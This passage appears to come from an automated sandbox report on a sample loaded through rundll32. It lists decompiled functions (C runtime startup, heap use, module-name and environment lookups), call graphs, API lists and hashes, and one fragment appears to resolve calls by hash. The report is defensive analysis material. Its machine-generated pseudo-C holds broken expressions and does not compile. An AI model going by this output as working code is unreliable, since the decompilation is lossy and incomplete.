				E00000201201A29A908C(0x4a75e5e7, _t142,  *((intOrPtr*)( *0xa29ad458 + 0x10)));
				if (_t142 == 0) goto 0xa29a3067;
				 *_t142();
				 *(_t170 + 0x98) =  *(_t170 + 0x98) & 0x00000000;
				 *(_t170 + 0x9c) =  *(_t170 + 0x9c) & 0x00000000;
				E00000201201A29A908C(0x8d72aad2, _t142,  *((intOrPtr*)(_t203 + 0x10)));
				if (_t142 == 0) goto 0xa29a308e;
				 *_t142();
				return _t99;
			}







































                                0x201a29a2dc4
                                0x201a29a2dc7
                                0x201a29a2dcb
                                0x201a29a2ddf
                                0x201a29a2de6
                                0x201a29a2deb
                                0x201a29a2dfc
                                0x201a29a2e04
                                0x201a29a2e07
                                0x201a29a2e0e
                                0x201a29a2e1a
                                0x201a29a2e1e
                                0x201a29a2e1e
                                0x201a29a2e22
                                0x201a29a2e27
                                0x201a29a2e29
                                0x201a29a2e2e
                                0x201a29a2e34
                                0x201a29a2e50
                                0x201a29a2e56
                                0x201a29a2e5e
                                0x201a29a2e61
                                0x201a29a2e64
                                0x201a29a2e6c
                                0x201a29a2e6e
                                0x201a29a2e75
                                0x201a29a2e7e
                                0x201a29a2e83
                                0x201a29a2e88
                                0x201a29a2e91
                                0x201a29a2e98
                                0x201a29a2ea3
                                0x201a29a2eaa
                                0x201a29a2eb2
                                0x201a29a2eb7
                                0x201a29a2ebf
                                0x201a29a2ec4
                                0x201a29a2ec9
                                0x201a29a2edd
                                0x201a29a2edf
                                0x201a29a2ee8
                                0x201a29a2eec
                                0x201a29a2ef4
                                0x201a29a2efc
                                0x201a29a2f03
                                0x201a29a2f09
                                0x201a29a2f10
                                0x201a29a2f15
                                0x201a29a2f1e
                                0x201a29a2f23
                                0x201a29a2f2b
                                0x201a29a2f37
                                0x201a29a2f3a
                                0x201a29a2f3d
                                0x201a29a2f42
                                0x201a29a2f46
                                0x201a29a2f48
                                0x201a29a2f58
                                0x201a29a2f67
                                0x201a29a2f6d
                                0x201a29a2f6f
                                0x201a29a2f7e
                                0x201a29a2f84
                                0x201a29a2f8d
                                0x201a29a2f92
                                0x201a29a2f9a
                                0x201a29a2f9c
                                0x201a29a2fb1
                                0x201a29a2fb3
                                0x201a29a2fc0
                                0x201a29a2fc7
                                0x201a29a2fd1
                                0x201a29a2fdc
                                0x201a29a2fe4
                                0x201a29a2feb
                                0x201a29a2ff0
                                0x201a29a2ff2
                                0x201a29a2ffb
                                0x201a29a2ffd
                                0x201a29a300d
                                0x201a29a300f
                                0x201a29a3026
                                0x201a29a302b
                                0x201a29a3032
                                0x201a29a303c
                                0x201a29a3044
                                0x201a29a304c
                                0x201a29a3057
                                0x201a29a305f
                                0x201a29a3065
                                0x201a29a3067
                                0x201a29a306e
                                0x201a29a307e
                                0x201a29a3086
                                0x201a29a308c
                                0x201a29a30a0

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.358453986.00000201A29A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201A29A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_201a29a0000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$Free$Alloc
                                • String ID: uJ
                                • API String ID: 3901518246-2850656762
                                • Opcode ID: e0b0127afc2e475f9b0db1383f047a2d59cc43cd89f7ddf17b2878a33f882b21
                                • Instruction ID: c40eebda2bd87cf1b59b6ef16b6a848b29b1cd0fcc7af68622d451b3d3e4959c
                                • Opcode Fuzzy Hash: e0b0127afc2e475f9b0db1383f047a2d59cc43cd89f7ddf17b2878a33f882b21
                                • Instruction Fuzzy Hash: 2381A2327027A096EF58CB1AE54879F73A4F788B88F214025EF4947B86DF39D466CB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000201A29A5EE8 Relevance: 5.1, APIs: 4, Instructions: 64memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 708 201a29a5ee8-201a29a5f0d 709 201a29a5f0f-201a29a5f20 call 201a29a908c 708->709 710 201a29a5f28-201a29a5f2d 708->710 709->710 722 201a29a5f22 709->722 711 201a29a5f2f-201a29a5f40 call 201a29a908c 710->711 712 201a29a5f48-201a29a5f4d 710->712 711->712 723 201a29a5f42 711->723 715 201a29a5f4f-201a29a5f60 call 201a29a908c 712->715 716 201a29a5f68-201a29a5f6f 712->716 715->716 729 201a29a5f62 715->729 720 201a29a5f7c-201a29a5f83 716->720 721 201a29a5f71-201a29a5f76 HeapFree 716->721 725 201a29a5f90-201a29a5f97 720->725 726 201a29a5f85-201a29a5f8a HeapFree 720->726 721->720 722->710 723->712 727 201a29a5f99-201a29a5f9e HeapFree 725->727 728 201a29a5fa4-201a29a5fab 725->728 726->725 727->728 730 201a29a5fad-201a29a5fb2 HeapFree 728->730 731 201a29a5fb8-201a29a5fc7 728->731 729->716 730->731
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.358453986.00000201A29A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201A29A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_201a29a0000_rundll32.jbxd
                                Similarity
                                • API ID: FreeHeap$ErrorLast
                                • String ID:
                                • API String ID: 2332451156-0
                                • Opcode ID: 0ed388b5329a4180b2c24342a2badd19053e0c758b32aa678527091eff390745
                                • Instruction ID: 9bfbeb966fe58ed17cbce691f12914b5c72d9539aae2f10904eb1771da0a80f3
                                • Opcode Fuzzy Hash: 0ed388b5329a4180b2c24342a2badd19053e0c758b32aa678527091eff390745
                                • Instruction Fuzzy Hash: 9E211D61702B7081FF98DB6AD54836E63A1EB89FC8F685025DE0D5779ACF38C892C300
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Executed Functions

                                Function 00007FFC130EB3A0 Relevance: 18.1, APIs: 12, Instructions: 133COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 7ffc130eb3a0-7ffc130eb3a6 1 7ffc130eb3a8-7ffc130eb3ab 0->1 2 7ffc130eb3e1-7ffc130eb538 0->2 3 7ffc130eb3d5-7ffc130eb414 call 7ffc130eb89c 1->3 4 7ffc130eb3ad-7ffc130eb3b0 1->4 8 7ffc130eb53a-7ffc130eb53c 2->8 9 7ffc130eb53e-7ffc130eb559 call 7ffc130eb72c 2->9 20 7ffc130eb416-7ffc130eb418 3->20 21 7ffc130eb41d-7ffc130eb432 call 7ffc130eb72c 3->21 6 7ffc130eb3c8 __scrt_dllmain_crt_thread_attach 4->6 7 7ffc130eb3b2-7ffc130eb3b5 4->7 13 7ffc130eb3cd-7ffc130eb3d4 6->13 11 7ffc130eb3b7-7ffc130eb3c0 7->11 12 7ffc130eb3c1-7ffc130eb3c6 call 7ffc130eb7dc 7->12 14 7ffc130eb58e-7ffc130eb59d 8->14 23 7ffc130eb55b-7ffc130eb560 call 7ffc130ebc0c 9->23 24 7ffc130eb565-7ffc130eb58c call 7ffc130eb858 call 7ffc130eb888 call 7ffc130eba50 call 7ffc130eba74 9->24 12->13 25 7ffc130eb505-7ffc130eb51a 20->25 32 7ffc130eb434-7ffc130eb439 call 7ffc130ebc0c 21->32 33 7ffc130eb43e-7ffc130eb44f call 7ffc130eb79c 21->33 23->24 24->14 32->33 40 7ffc130eb4b8-7ffc130eb4c2 call 7ffc130eba50 33->40 41 7ffc130eb451-7ffc130eb48d call 7ffc130ebd54 call 7ffc130ebaf0 call 7ffc130ebbb4 call 7ffc130ebaf0 call 7ffc130ebbe0 call 7ffc130ed0c8 33->41 40->20 49 7ffc130eb4c8-7ffc130eb4d4 call 7ffc130ebbfc 40->49 41->40 68 7ffc130eb48f-7ffc130eb496 __scrt_dllmain_after_initialize_c 41->68 54 7ffc130eb4fa-7ffc130eb500 49->54 55 7ffc130eb4d6-7ffc130eb4e0 call 7ffc130eb9b4 49->55 54->25 55->54 62 7ffc130eb4e2-7ffc130eb4f5 call 7ffc130ebdec 55->62 62->54 68->40 69 7ffc130eb498-7ffc130eb4b5 call 7ffc130ed050 68->69 69->40
                                C-Code - Quality: 100%
                                			E00007FFC7FFC130EB3A0(void* __edx) {
				void* _t5;

				_t5 = __edx;
				if (_t5 == 0) goto 0x130eb3e1;
				if (_t5 == 0) goto 0x130eb3d5;
				if (_t5 == 0) goto 0x130eb3c8;
				if (__edx == 1) goto 0x130eb3c1;
				return 1;
			}




                                0x7ffc130eb3a4
                                0x7ffc130eb3a6
                                0x7ffc130eb3ab
                                0x7ffc130eb3b0
                                0x7ffc130eb3b5
                                0x7ffc130eb3c0

                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_is_nonwritable_in_current_image__scrt_release_startup_lock
                                • String ID:
                                • API String ID: 3885183344-0
                                • Opcode ID: 4b4e070a4b30cda99fb3dc24f2d45a93fe48c4a995dadef060bf1a20821bd7b8
                                • Instruction ID: 16b6b08da8b7b05c29702a84e49a71bc7655186e0b7c35f39b35c38ddf256081
                                • Opcode Fuzzy Hash: 4b4e070a4b30cda99fb3dc24f2d45a93fe48c4a995dadef060bf1a20821bd7b8
                                • Instruction Fuzzy Hash: 39519E21F0CE6F85FA24AB66A4422B926E0AF543ACF644031E54D377E7DE2CE465C734
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130F0A40 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FFC130ED8CF), ref: 00007FFC130F0A59
                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FFC130ED8CF), ref: 00007FFC130F0ABB
                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FFC130ED8CF), ref: 00007FFC130F0AF5
                                • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFC130ED8CF), ref: 00007FFC130F0B1F
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                • String ID:
                                • API String ID: 1557788787-0
                                • Opcode ID: ef2e6b779f9dc2e69840adeab8782f97473b4efd568450990a456c347f97633f
                                • Instruction ID: 75863bbc0e5a97b7931cc7ec22bc21650c1f600872e9325186121a1c448551bc
                                • Opcode Fuzzy Hash: ef2e6b779f9dc2e69840adeab8782f97473b4efd568450990a456c347f97633f
                                • Instruction Fuzzy Hash: A1213431F18BA982E620CF11A94002AA6E8BB58BECB184174DE4E73B94DF3CE461C710
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130ED734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 52%
                                			E00007FFC7FFC130ED734(void* __ecx, intOrPtr* __rax, long long __rbx, void* __rcx, void* __r8, long long _a8, signed int _a16, signed int _a24, signed int _a32) {
				long long _v56;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t27;
				intOrPtr _t36;
				intOrPtr* _t62;
				long long _t68;
				void* _t70;
				long long _t84;
				signed int _t85;
				intOrPtr* _t86;
				void* _t89;

				_t70 = __rcx;
				_a8 = __rbx;
				_t2 = _t70 - 1; // -1
				r14d = __ecx;
				if (_t2 - 1 <= 0) goto 0x130ed768;
				_t27 = E00007FFC7FFC130EE6A0(__rax);
				 *__rax = 0x16;
				E00007FFC7FFC130EE580(_t27);
				goto 0x130ed897;
				E00007FFC7FFC130F05F8();
				r8d = 0x104;
				GetModuleFileNameA(??, ??, ??);
				_t86 =  *0x13124950; // 0x27a6bdf3370
				 *0x13124960 = 0x131243e0;
				if (_t86 == 0) goto 0x130ed79f;
				if ( *_t86 != dil) goto 0x130ed7a2;
				_t62 =  &_a32;
				_a24 = _t85;
				_v56 = _t62;
				r8d = 0;
				_a32 = _t85;
				E00007FFC7FFC130ED514(0x131243e0, 0x131243e0, 0x131243e0, _t85, 0x131243e0, _t89, __r8,  &_a24);
				r8d = 1;
				E00007FFC7FFC130ED6D0(_a24, _a32, __r8); // executed
				_t68 = _t62;
				if (_t62 != 0) goto 0x130ed7f3;
				E00007FFC7FFC130EE6A0(_t62);
				_t10 = _t68 + 0xc; // 0xc
				 *_t62 = _t10;
				goto 0x130ed892;
				_v56 =  &_a32;
				E00007FFC7FFC130ED514(_t68, 0x131243e0, _t68, _t85, 0x131243e0, _t89, _t62 + _a24 * 8,  &_a24);
				if (r14d != 1) goto 0x130ed829;
				_t36 = _a24 - 1;
				 *0x13124940 = _t68;
				 *0x1312493c = _t36;
				goto 0x130ed7ec;
				_a16 = _t85;
				0x130efef4();
				if (_t36 == 0) goto 0x130ed858;
				E00007FFC7FFC130EE114( &_a32, _a16);
				_a16 = _t85;
				E00007FFC7FFC130EE114( &_a32, _t68);
				goto 0x130ed897;
				_t84 = _a16;
				if ( *_t84 == _t85) goto 0x130ed873;
				if ( *((intOrPtr*)(_t84 + 8)) != _t85) goto 0x130ed867;
				 *0x1312493c = 0;
				_a16 = _t85;
				 *0x13124940 = _t84;
				E00007FFC7FFC130EE114(_t84 + 8, _t85 + 1);
				_a16 = _t85;
				E00007FFC7FFC130EE114(_t84 + 8, _t68);
				return _t36;
			}
















                                0x7ffc130ed734
                                0x7ffc130ed734
                                0x7ffc130ed747
                                0x7ffc130ed74a
                                0x7ffc130ed750
                                0x7ffc130ed752
                                0x7ffc130ed75c
                                0x7ffc130ed75e
                                0x7ffc130ed763
                                0x7ffc130ed768
                                0x7ffc130ed774
                                0x7ffc130ed77f
                                0x7ffc130ed785
                                0x7ffc130ed78e
                                0x7ffc130ed798
                                0x7ffc130ed79d
                                0x7ffc130ed7a2
                                0x7ffc130ed7a6
                                0x7ffc130ed7ae
                                0x7ffc130ed7b3
                                0x7ffc130ed7b6
                                0x7ffc130ed7bf
                                0x7ffc130ed7c8
                                0x7ffc130ed7d5
                                0x7ffc130ed7da
                                0x7ffc130ed7e0
                                0x7ffc130ed7e2
                                0x7ffc130ed7e7
                                0x7ffc130ed7ea
                                0x7ffc130ed7ee
                                0x7ffc130ed805
                                0x7ffc130ed80a
                                0x7ffc130ed813
                                0x7ffc130ed818
                                0x7ffc130ed81a
                                0x7ffc130ed821
                                0x7ffc130ed827
                                0x7ffc130ed82d
                                0x7ffc130ed834
                                0x7ffc130ed83d
                                0x7ffc130ed843
                                0x7ffc130ed84b
                                0x7ffc130ed84f
                                0x7ffc130ed856
                                0x7ffc130ed858
                                0x7ffc130ed865
                                0x7ffc130ed871
                                0x7ffc130ed873
                                0x7ffc130ed87b
                                0x7ffc130ed87f
                                0x7ffc130ed886
                                0x7ffc130ed88e
                                0x7ffc130ed892
                                0x7ffc130ed8a9

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: FileModuleName_invalid_parameter_noinfo
                                • String ID: C:\Windows\system32\rundll32.exe
                                • API String ID: 3307058713-1534550049
                                • Opcode ID: 608f3a59dde5b4256447cf5f0bb571404734e00e084907b6274e3e22c00ab3e2
                                • Instruction ID: 7084bbd1c2dbe938e4b6161fd7881040c3d3f0c8cf2092391de03705d42cb1b7
                                • Opcode Fuzzy Hash: 608f3a59dde5b4256447cf5f0bb571404734e00e084907b6274e3e22c00ab3e2
                                • Instruction Fuzzy Hash: 8741C532B08E6A8AFB14DF2AE9400BD67E4EF44BA8B544035E94D27795DE3CE461C320
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130EB89C Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 65%
                                			E00007FFC7FFC130EB89C(void* __ecx) {
				void* __rbx;
				void* _t12;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;

				_t2 =  ==  ? 1 :  *0x131241f8 & 0x000000ff;
				 *0x131241f8 =  ==  ? 1 :  *0x131241f8 & 0x000000ff;
				E00007FFC7FFC130EBDF4(1, _t12, _t17, _t18, _t19, _t20);
				if (E00007FFC7FFC130EC7DC() != 0) goto 0x130eb8cb;
				goto 0x130eb8df; // executed
				E00007FFC7FFC130EE090(_t17); // executed
				if (0 != 0) goto 0x130eb8dd;
				E00007FFC7FFC130EC838(0);
				goto 0x130eb8c7;
				return 1;
			}









                                0x7ffc130eb8b0
                                0x7ffc130eb8b3
                                0x7ffc130eb8b9
                                0x7ffc130eb8c5
                                0x7ffc130eb8c9
                                0x7ffc130eb8cb
                                0x7ffc130eb8d2
                                0x7ffc130eb8d6
                                0x7ffc130eb8db
                                0x7ffc130eb8e4

                                APIs
                                • __isa_available_init.LIBCMT ref: 00007FFC130EB8B9
                                • __vcrt_initialize.LIBVCRUNTIME ref: 00007FFC130EB8BE
                                  • Part of subcall function 00007FFC130EC7DC: __vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00007FFC130EC7E0
                                  • Part of subcall function 00007FFC130EC7DC: __vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00007FFC130EC7E5
                                  • Part of subcall function 00007FFC130EC7DC: __vcrt_initialize_locks.LIBVCRUNTIME ref: 00007FFC130EC7EA
                                • __vcrt_uninitialize.LIBVCRUNTIME ref: 00007FFC130EB8D6
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: __isa_available_init__vcrt_initialize__vcrt_initialize_locks__vcrt_initialize_pure_virtual_call_handler__vcrt_initialize_winapi_thunks__vcrt_uninitialize
                                • String ID:
                                • API String ID: 3388242289-0
                                • Opcode ID: 069ba207e829dfcd2a7a09410ea271609d7bb695ba881f2a8a90ee759a22d1bf
                                • Instruction ID: 2e6de87951bdce05e13e226305b4458111acbcaf336990c934c9e8c891d01c1f
                                • Opcode Fuzzy Hash: 069ba207e829dfcd2a7a09410ea271609d7bb695ba881f2a8a90ee759a22d1bf
                                • Instruction Fuzzy Hash: A2E09240F0CEAF06FD54266211522B81BD00F2532CF210475D8AD722C3CE0D74BAE635
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130F3AC0 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 71%
                                			E00007FFC7FFC130F3AC0(void* __ecx, void* __edx, long long __rax, signed int __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __rbp, void* __r9, long long _a8, long long _a16, long long _a24) {
				long long _v24;
				void* _t18;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr _t24;
				void* _t32;
				long long _t39;
				signed long long _t45;

				_t39 = __rax;
				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				_t32 = __ecx;
				if ((0 | __ecx - 0x00002000 > 0x00000000) != 0) goto 0x130f3afd;
				_t18 = E00007FFC7FFC130EE6A0(__rax);
				 *((intOrPtr*)(__rax)) = 9;
				E00007FFC7FFC130EE580(_t18);
				goto 0x130f3b61;
				E00007FFC7FFC130EF2B0();
				_t45 = __rbx;
				_v24 = __rbx;
				_t21 =  *0x13124d70; // 0x40
				if (_t32 - _t21 < 0) goto 0x130f3b55;
				if ( *((intOrPtr*)(0x13124970 + __rbx * 8)) == __rbx) goto 0x130f3b29;
				goto 0x130f3b4b; // executed
				E00007FFC7FFC130F39D8( *((intOrPtr*)(0x13124970 + __rbx * 8)) - __rbx, __rax, __rbx, __rcx, __rdx, __rsi, __rbp, __r9); // executed
				 *((long long*)(0x13124970 + _t45 * 8)) = _t39;
				if (_t39 != 0) goto 0x130f3b3c;
				goto 0x130f3b55;
				_t23 =  *0x13124d70; // 0x40
				_t24 = _t23 + 0x40;
				 *0x13124d70 = _t24;
				_v24 = _t45 + 1;
				goto 0x130f3b16;
				E00007FFC7FFC130EF304();
				goto 0x130f3af9;
				return _t24;
			}











                                0x7ffc130f3ac0
                                0x7ffc130f3ac0
                                0x7ffc130f3ac5
                                0x7ffc130f3aca
                                0x7ffc130f3ad5
                                0x7ffc130f3ae6
                                0x7ffc130f3ae8
                                0x7ffc130f3af2
                                0x7ffc130f3af4
                                0x7ffc130f3afb
                                0x7ffc130f3b02
                                0x7ffc130f3b08
                                0x7ffc130f3b0b
                                0x7ffc130f3b10
                                0x7ffc130f3b18
                                0x7ffc130f3b25
                                0x7ffc130f3b27
                                0x7ffc130f3b29
                                0x7ffc130f3b2e
                                0x7ffc130f3b35
                                0x7ffc130f3b3a
                                0x7ffc130f3b3c
                                0x7ffc130f3b42
                                0x7ffc130f3b45
                                0x7ffc130f3b4e
                                0x7ffc130f3b53
                                0x7ffc130f3b5a
                                0x7ffc130f3b5f
                                0x7ffc130f3b76

                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: _invalid_parameter_noinfo
                                • String ID:
                                • API String ID: 3215553584-0
                                • Opcode ID: e1fbc31160e4b4ac265e7fa731fe9e1eab700c2b4d0d0f1e7a082a805eaa686e
                                • Instruction ID: d5a531d1d487517369e4fa3185e46680de255470d44bb0d5db0ef071cacbf287
                                • Opcode Fuzzy Hash: e1fbc31160e4b4ac265e7fa731fe9e1eab700c2b4d0d0f1e7a082a805eaa686e
                                • Instruction Fuzzy Hash: F5114F32A1CEAA83F7109B21A95113973E8BB403B8F5501B5E68D677D6DF2CE820C764
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130EE26C Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 37%
                                			E00007FFC7FFC130EE26C(void* __eax, signed int __rcx, signed int __rdx) {
				void* __rbx;
				intOrPtr* _t22;
				signed int _t29;

				_t29 = __rdx;
				if (__rcx == 0) goto 0x130ee28b;
				_t1 = _t29 - 0x20; // -32
				_t22 = _t1;
				if (_t22 - __rdx < 0) goto 0x130ee2ce;
				_t25 =  ==  ? _t22 : __rcx * __rdx;
				goto 0x130ee2b2;
				if (E00007FFC7FFC130F1374() == 0) goto 0x130ee2ce;
				if (E00007FFC7FFC130F0F5C(_t22,  ==  ? _t22 : __rcx * __rdx,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0x130ee2ce;
				RtlAllocateHeap(??, ??, ??); // executed
				if (_t22 == 0) goto 0x130ee29d;
				goto 0x130ee2db;
				E00007FFC7FFC130EE6A0(_t22);
				 *_t22 = 0xc;
				return 0;
			}






                                0x7ffc130ee26c
                                0x7ffc130ee27b
                                0x7ffc130ee27f
                                0x7ffc130ee27f
                                0x7ffc130ee289
                                0x7ffc130ee297
                                0x7ffc130ee29b
                                0x7ffc130ee2a4
                                0x7ffc130ee2b0
                                0x7ffc130ee2c1
                                0x7ffc130ee2ca
                                0x7ffc130ee2cc
                                0x7ffc130ee2ce
                                0x7ffc130ee2d3
                                0x7ffc130ee2e0

                                APIs
                                • RtlAllocateHeap.NTDLL(?,?,00000000,00007FFC130EF1A8,?,?,0000B74F7D657C87,00007FFC130EE6A9,?,?,?,?,00007FFC130EE139,?,?,?), ref: 00007FFC130EE2C1
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: 38d319fa34a6f28828c9c4252ccc1e606beff5a42ae1a748ed59fc70cab1af25
                                • Instruction ID: 9694324d2e43737ca9127306a7431f6886f4d63b6e61b01c09408d5251f2fc59
                                • Opcode Fuzzy Hash: 38d319fa34a6f28828c9c4252ccc1e606beff5a42ae1a748ed59fc70cab1af25
                                • Instruction Fuzzy Hash: D4F09644B09F2F41FE545FA199103B552D41F89B68F5C5438CD0EB67C6DE1CE8A0C130
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                Function 00007FFC130EE374 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                Download Yara Rule
                                C-Code - Quality: 65%
                                			E00007FFC7FFC130EE374(void* __ecx, intOrPtr __edx, void* __esp, long long __rbx, void* __rdx, long long __rsi, void* __r8) {
				void* __rdi;
				void* _t36;
				int _t40;
				void* _t43;
				void* _t44;
				intOrPtr _t52;
				signed long long _t62;
				long long _t65;
				_Unknown_base(*)()* _t85;
				void* _t89;
				void* _t90;
				void* _t92;
				signed long long _t93;
				struct _EXCEPTION_POINTERS* _t99;

				_t45 = __ecx;
				 *((long long*)(_t92 + 0x10)) = __rbx;
				 *((long long*)(_t92 + 0x18)) = __rsi;
				_t3 = _t92 - 0x4f0; // -1288
				_t90 = _t3;
				_t93 = _t92 - 0x5f0;
				_t62 =  *0x13123760; // 0xb74f7d657c87
				 *(_t90 + 0x4e0) = _t62 ^ _t93;
				_t52 = r8d;
				_t44 = __ecx;
				if (__ecx == 0xffffffff) goto 0x130ee3b3;
				E00007FFC7FFC130EBC04(_t36);
				_t5 = _t93 + 0x70; // 0x58
				r8d = 0x98;
